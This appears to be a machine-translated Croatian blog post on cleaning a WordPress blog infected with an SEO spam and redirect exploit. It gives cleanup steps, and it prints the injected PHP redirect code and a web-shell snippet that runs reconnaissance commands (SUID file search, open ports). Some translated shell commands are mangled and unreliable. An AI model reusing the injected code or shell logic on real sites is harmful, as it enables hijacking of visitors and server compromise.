Virusna blogosfera ... ali što ste imali sa mnom ?!

U posljednjih mjesec dana, dobio sam upozorenja Virus blog u nekim posjetitelja. U početku sam ignorirao upozorenja, jer sam instalirao prilično dobar antivirus (Kaspersky AV 2009) I iako je blog za dugo vremena, nikada nisam dobio virus upozorenje (.. Vidjela sam nešto sumnjivo ranije da prvi refresh nestali. Konačno ...).
Polako je počeo da se pojave velike varijacije prometa posjetiteljaNakon što je pao promet u zadnje vrijeme stalno i počeo se sve više i više ljudi koji mi kažu da stealthsettings.com to je virused. Jučer sam dobio od nekoga screenshot učinjeno kada je antivirusni blokirani rukopis od stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. To je bio prilično uvjerljiv na mene, da sam mu sve izvore tražili. Prva ideja da je palo na pamet bila je učiniti nadogradnja najnovije WordPress (2.5.1), ali ne prije brisanja svih datoteka u staroj skripti WordPress i napraviti backup baze podataka. Ovaj postupak nije uspio i vjerojatno mi je trebalo dugo vremena da shvatim gdje je greška, ako mi nije rekao. Eugen u razgovoru uz kavu, on je pronašao link Google, a bilo bi dobro da ga vidi.
MyDigitalLife.info, objavio je članak pod naslovom: “WordPress Hakiranje: oporavite i popravite Google i tražilicu ili se promet kolačića ne preusmjerava na Your-Needs.info, AnyResults.Net, Golden-Info.net i druge ilegalne stranice"To je kraj nit mi je trebalo.
Riječ je o iskorištavati de WordPress na temelju kolačića, Što mislim da je vrlo složen i napravio knjigu. Dovoljno pametan da bi SQL Injection Baza podataka o blogu, stvoriti nevidljivi korisnik jednostavna rutinska provjera Nadzorna ploča->korisnici, provjeriti poslužitelja direktorija i datoteka "writable" (da chmod 777), tražiti i to izvršiti datoteke s privilegijama root korisnika ili skupine. Ne znam koji iskorištavaju ime i vidjeti da postoji nekoliko članaka o njemu pisano, unatoč činjenici da su mnogi blogovi zaraženi, uključujući i Rumunjsku. Ok ... Pokušat ću pokušati objasniti općenitosti o virusu.

Što je virus?

Prvo, ubacite stranice izvor za blogove, nevidljive veze s posjetiteljima, ali vidljiv i indeksira za tražilice, posebno Google. Ovako prijenos stranicu rang stanice označene napadača. Drugo, umetnut je drugi preusmjeravanje broj URL za posjetitelje koji dolaze iz Googlea, Live, Yahoo, ... ili RSS čitač, a ne stranica kolačić. antivirusni detektira kao preusmjeravanje Trojan-Clicker.HTML.

Simptomi:

Masivni pad prometa posjetitelja, Pogotovo na blogovima, gdje je većina posjetitelja dolaze iz Googlea.

Identifikacija: (ovdje se problem komplicira za one koji ne znaju mnogo o phpmyadmin, php i linux)

LA. POZOR! Prvo napraviti backup baze podataka!

1. Provjerite datoteke izvornog index.php, header.php, footer.php, Blog temu i vidjeti postoji li kod koji koristi enkripciju base64 ili sadrži “if ($ ser ==” 1? && sizeof ($ _ COOKIE) == 0) ”u obliku:

<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>

Ili ... nešto. Izbriši ovaj kod!

Kliknite na sliku ...

Indeks broj

Na gornjoj snimci zaslona slučajno sam odabrao i " ". Taj kod mora ostati.

2. Koristiti phpMyAdmin i otići na tablici baze podataka wp_usersGdje provjeriti ako nema korisničko ime stvorio na 00:00:00 0000-00-00 (Mogući prostor user_login napisati "WordPress”. Zapišite ID ovog korisnika (polje ID), a zatim ga izbrišite.

Kliknite na sliku ...

lažni korisnik

* Zelena linija trebala biti uklonjena i zadržao svoju iskaznicu. U slučaju pospanJe ID = 8 .

3. Idi na tablici wp_usermeta, Gdje se Smješten i brisanje linije za ID (gdje se polje user_id ID vrijednost se brišu).

4. U tablici wp_optionIdi active_plugins i vidjeti što plugin omogućen osumnjičenog. To se može koristiti kao završetaka _old.giff, _old.pngg, _old.jpeg, _new.php.giffitd. kombinacije bogatih ekstenzija slike sa _old i _new.

SELECT * FROM wp_options WHERE option_name = 'active_plugins'

Izbrišite ovaj dodatak, a zatim idite na blog -> Nadzorna ploča -> Dodaci, gdje deaktivirate i aktivirate bilo koji dodatak.

Kliknite na sliku kako bi vidjeli što se čini active_plugins virus datoteku.

uključiti

Slijedite put na FTP ili SSH, navedeno je u active_plugins i brisanje datoteke s poslužitelja.

5. Sve u phpMyAdmin, u tablici wp_option, Pronaći i izbrisati redak koji sadrži "rss_f541b3abd05e7962fcab37737f40fad8"I među"internal_links_cache ".
U internal_links_cache su šifrirane spam linkove koji se pojavljuju na svoj blog i šifra od Google Adspotiljak, Haker.

6. Preporučio je da se promijenite lozinku Blog i prijava Izbaci sve sumnjive userele. Nadogradite na najnoviju verziju WordPress i postavite blog da prestane registrirati nove korisnike. Nema gubitka... mogu komentirati i nenaseljeni.

Pokušao sam gore objasniti malo, što učiniti u takvoj situaciji, očistiti blog od ovog virusa. Problem je puno ozbiljniji nego što se čini i nije gotovo riješen, jer se koriste sigurnosnih propusta web poslužitelj hosting, što je blog.

Kao prve mjere sigurnosti, s pristupom SSH, Napraviti neke provjere na server da vidi je li sve datoteke kao što su * _old * i * _new. * S završetaka.giff,. jpeg,. pngg,. jpgg. Ove datoteke trebaju biti izbrisani. Ako ste preimenovati datoteku, primjerice. top_right_old.giff in top_right_old.phpVidimo da je točno file server exploit koda.

Neke korisne upute za provjeru, čišćenje i osiguranje poslužitelja. (putem SSH-a)

1.  cd / tmp i provjeriti da li postoje mape poput tmpVFlma ili druge kombinacije ima isto ime i izbrisati. Pogledajte screenshot dolje, dvije takve mape od mene:

tmpserver

rm-rf nazivmape

2. Provjerite i eliminirajte (promijenite chmod-ul) po mogućnosti mape s atributima chmod 777

pronađi sve datoteke za pisanje u trenutnom direktoriju: Pronađite. Tip-f-Perm-2-LS
pronaći sve writable direktorija u tekuće dir: Pronađite. Tip-d-Perm-2-LS
pronađi sve direktorije i datoteke u koje se može pisati u trenutnom direktoriju: Pronađite. -Perm-2-LS

3. U potrazi za sumnjive datoteke na poslužitelju.

find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"

4, POZOR! datoteke koje su postavljene malo SUID si SGID. Ove datoteke izvršavanje s privilegijama korisnika (skupina) ili korijena, a ne korisnika koji izvrši datoteku. Te datoteke mogu dovesti do korijena kompromisa, ako je sigurnosna pitanja. Ako koristite datoteke s Suid i SGID bita, radi 'chmod 0 " ili deinstalirati paket ih sadrži.

Iskoristiti sadrži negdje u izvor ...:

if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}

Na ovaj način ... zapravo pronalazi povrede u sigurnosti. Luke otvaranje imenika "writable" i grupa ovršni povlastice datoteke / root.

Povratak s više ...

Neki blogovi zaražene: www.blegoo.com, www.visurat.ro,

fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motocikli.motomag.ro,

emi.brainient.com, www.picsel.ro,

www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

dragos.roua.ro, www.artistul.ro/blog/,

www.mirabilismedia.ro/blog, blog.einvest.ro
... Popis ide na ... puno.

Pomoću Google tražilice možete provjeriti je li blog zaražen. kopiraj i zalijepi:

stranica www.blegoo.com buy

Laku noć i dobar posao;) Uskoro mislim da će Eugen doći s vijestima, na foreseeable.unpredictable.com.

BRB :)

PAŽNJA! Promjena teme od WordPress ili nadogradite na WordPress 2.5.1, NIJE rješenje za uklanjanje ovog virusa.

Strastveni zaljubljenik u tehnologiju, s veseljem pišem na StealthSettings.com od 2006. godine. Imam bogato iskustvo s operativnim sustavima: macOS, Windows i Linux, kao i s programskim jezicima i platformama za bloganje (WordPress) i za internetske trgovine (WooCommerce, Magento, PrestaShop).

kako » vrijedan pažnje » Virusna blogosfera ... ali što ste imali sa mnom ?!
Ostavite komentar